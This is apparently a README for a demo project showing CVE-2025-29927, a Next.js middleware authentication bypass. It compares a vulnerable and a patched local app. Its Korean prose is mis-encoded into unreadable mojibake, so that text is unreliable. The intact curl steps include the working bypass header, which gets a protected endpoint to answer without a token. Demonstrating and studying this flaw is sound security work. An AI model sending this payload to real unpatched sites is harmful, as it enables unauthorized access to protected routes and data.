Share 
## https://sploitus.com/exploit?id=40EAD8B7-C70F-5CF7-BBBD-2D74930876C1
# Next.js CVE-2025-29927 ๋ฏธ๋“ค์›จ์–ด ์ทจ์•ฝ์ 

์ด ๋ ˆํฌ์ง€ํ† ๋ฆฌ๋Š” Next.js 15.2.3 ๋ฒ„์ „๊ณผ Next.js 15.1.7 ๋ฒ„์ „์„ ์‚ฌ์šฉํ•˜์—ฌ CVE-2025-29927 ๋ฏธ๋“ค์›จ์–ด ์ทจ์•ฝ์ ์„ ๋น„๊ตํ•ด๋ณผ ์ˆ˜ ์žˆ๋Š” ๋ชจ๋…ธ๋ ˆํฌ ํ”„๋กœ์ ํŠธ์ž…๋‹ˆ๋‹ค.

## ์ทจ์•ฝ์  ์„ค๋ช…

CVE-2025-29927๋Š” Next.js์˜ ๋ฏธ๋“ค์›จ์–ด์—์„œ ๋ฐœ๊ฒฌ๋œ ๋ณด์•ˆ ์ทจ์•ฝ์ ์œผ๋กœ, x-middleware-subrequest ํ—ค๋”๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์ธ์ฆ ๋ฏธ๋“ค์›จ์–ด๋ฅผ ์šฐํšŒํ•  ์ˆ˜ ์žˆ๋Š” ๋ฌธ์ œ์ž…๋‹ˆ๋‹ค.
์ด ์ทจ์•ฝ์ ์€ ๋‹ค์Œ ๋ฒ„์ „์—์„œ ์˜ํ–ฅ์„ ๋ฐ›์œผ๋ฉฐ:

- Next.js 15.x < 15.2.3
- Next.js 14.x < 14.2.25
- Next.js 13.x < 13.5.9
  ์œ„ ๋ฒ„์ „๋“ค์€ ๊ฐ๊ฐ ํ•ด๋‹น ํŒจ์น˜ ๋ฒ„์ „์œผ๋กœ ์—…๋ฐ์ดํŠธํ•˜์—ฌ ํ•ด๊ฒฐ๋˜์—ˆ์Šต๋‹ˆ๋‹ค.

## ์‹คํ–‰ ๋ฐฉ๋ฒ•

1. ์ €์žฅ์†Œ๋ฅผ ํด๋ก ํ•ฉ๋‹ˆ๋‹ค.
2. ์˜์กด์„ฑ์„ ์„ค์น˜ํ•ฉ๋‹ˆ๋‹ค. : `pnpm install`
3. ๊ฐœ๋ฐœ ์„œ๋ฒ„๋ฅผ ์‹คํ–‰ํ•ฉ๋‹ˆ๋‹ค. : `pnpm dev`
4. ๊ฐ ์•ฑ์— ์ ‘์†

- ํŒจ์น˜๋œ ๋ฒ„์ „ (15.2.3): http://localhost:3000
- ์ทจ์•ฝํ•œ ๋ฒ„์ „ (15.1.7): http://localhost:3001

5. ํ† ํฐ ์—†์ด /api/protected ์—”๋“œํฌ์ธํŠธ์— ์ ‘๊ทผํ•˜๋ฉด ์ ‘๊ทผ์ด ๊ฑฐ๋ถ€๋ฉ๋‹ˆ๋‹ค.

```
$ curl http://localhost:3000/api/protected
// {"error":"Unauthorized"}

$ curl http://localhost:3001/api/protected
// {"error":"Unauthorized"}
```

6. ์œ ํšจํ•œ ํ† ํฐ์„ ์ œ๊ณตํ•˜๋ฉด ๋ณดํ˜ธ๋œ ์—”๋“œํฌ์ธํŠธ์— ์„ฑ๊ณต์ ์œผ๋กœ ์ ‘๊ทผํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

```
$ curl -H "Authorization: my-jwt-token-here" http://localhost:3000/api/protected
// {"message":"Hello World"}

$ curl -H "Authorization: my-jwt-token-here" http://localhost:3001/api/protected
// {"message":"Hello World"}
```

7. ์ทจ์•ฝ์ ์„ ์ด์šฉํ•ด ๋ฏธ๋“ค์›จ์–ด๋ฅผ ์šฐํšŒํ•ฉ๋‹ˆ๋‹ค.

```
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/api/protected
// {"error":"Unauthorized"}

curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3001/api/protected
// {"message":"Hello World"}
```

## ํ”„๋กœ์ ํŠธ ๊ตฌ์กฐ

```
nextjs-cve-2025-29927/
โ”œโ”€โ”€ apps/
โ”‚   โ”œโ”€โ”€ next15_1_7/  # ์ทจ์•ฝํ•œ ๋ฒ„์ „
โ”‚   โ””โ”€โ”€ next15_2_3/  # ํŒจ์น˜๋œ ๋ฒ„์ „
โ”œโ”€โ”€ packages/
โ”‚   โ””โ”€โ”€ ui/          # ๊ณต์œ  UI ์ปดํฌ๋„ŒํŠธ
โ””โ”€โ”€ README.md
```

## ์ฐธ๊ณ ๋งํฌ

- [vercel๋ธ”๋กœ๊ทธ](https://vercel.com/blog/postmortem-on-next-js-middleware-bypass)
- [DevStefanCho์œ ํˆฌ๋ธŒ](https://www.youtube.com/watch?v=6PswGPu642Y&t=229s&ab_channel=DevStefanCho)
- https://hackyboiz.github.io/2025/03/27/bekim/2025-03-27/
- https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware
- https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw
- https://github.com/lirantal/vulnerable-nextjs-14-CVE-2025-29927